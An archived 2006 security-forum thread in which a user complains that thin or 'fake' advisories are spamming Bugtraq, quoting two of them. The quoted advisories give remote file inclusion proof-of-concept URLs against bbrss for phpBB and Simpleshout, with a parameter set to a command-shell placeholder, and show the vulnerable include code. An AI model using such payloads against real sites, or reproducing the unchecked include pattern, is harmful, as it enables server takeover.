|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 121
Members: 0
Total: 121
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
hello bugtraq? |
|
Posted: Thu Jun 15, 2006 2:16 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
i just dont get it, why "fake" or ----- advisory could spam the bugtraq
take a look at an advisories form this guys at http://search.securityfocus.com/swsearch?query=SpC-x&sbm=%2F&submit=Search%21&metaname=author&sort=swishlastmodified
... i dont get it ..
for example this advisory
Quote: | bbrss PhpBB (phpbb_root_path) Remote File Inclusion Jun 14 2006 04:56AM
SpC-x Bsdmail Org
######################################################
# bbrss PhpBB (phpbb_root_path) Remote File Inclusion
######################################################
# Credit : SpC-x | The_BeKiR
# Site : http://wWw.SaVSaK.CoM
######################################################
# Greetz :
# | The_BeKiR | Nukedx | Ejder | Str0ke | joffer | Poizonb0x |
######################################################
Remote File Inclusion :
http://www.target.com/path/bbrss.php?phpbb_root_path=Command*Shell
Bbrss.PHP :
define('IN_PHPBB', true); // to ensure your script works ! //
$phpbb_root_path = './';
include_once($phpbb_root_path . 'extension.inc');
include_once($phpbb_root_path . 'common.php');
/SpC-x |
what do you think with that ? |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Thu Jun 15, 2006 2:18 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
and this
Quote: | Simpleshout 1.6.0 Version - Remote File Include Vulnerability Jun 13 2006 05:44PM
SpC-x Bsdmail Org
# SaVSaK.CoM | SpC-x - The_BeKiR |
# Simpleshout 1.6.0 Version - Remote File Include Vulnerability
# Risk : High
# Class: Remote
# Script : Simpleshout
# Credits : SpC-x
# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx
# Code :
# // Require files
# require $config;
# Vulnerable :
# http://www.victim.com/Simpleshout/sboard.php?config=Command-Shell
|
damn... |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
www.waraxe.us Forum Index -> General discussion
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|